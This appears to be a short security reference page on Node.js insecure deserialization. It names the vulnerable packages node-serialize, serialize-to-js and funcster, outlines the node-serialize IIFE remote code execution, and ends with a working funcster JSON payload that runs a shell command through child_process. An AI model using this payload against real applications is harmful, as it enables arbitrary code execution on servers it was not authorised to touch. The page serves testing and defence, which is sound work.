Node Deserialization
Node.js deserialization refers to the process of reconstructing JavaScript objects from a serialized format, such as JSON, BSON, or other formats that represent structured data. In Node.js applications, serialization and deserialization are commonly used for data storage, caching, and inter-process communication.
Summary
Methodology
-
In Node source code, look for:
node-serialize
serialize-to-js
funcster
node-serialize
An issue was discovered in the node-serialize package 0.0.4 for Node.js. Untrusted data passed into the
unserialize()
function can be exploited to achieve arbitrary code execution by passing a JavaScript Object with an Immediately Invoked Function Expression (IIFE).
- Generate a serialized payload
- Add bracket
()
to force the execution - Send the payload
funcster
{"rce":{"__js_function":"function(){CMD=\"cmd /c calc\";const process = this.constructor.constructor('return this.process')();process.mainModule.require('child_process').exec(CMD,function(error,stdout,stderr){console.log(stdout)});}()"}}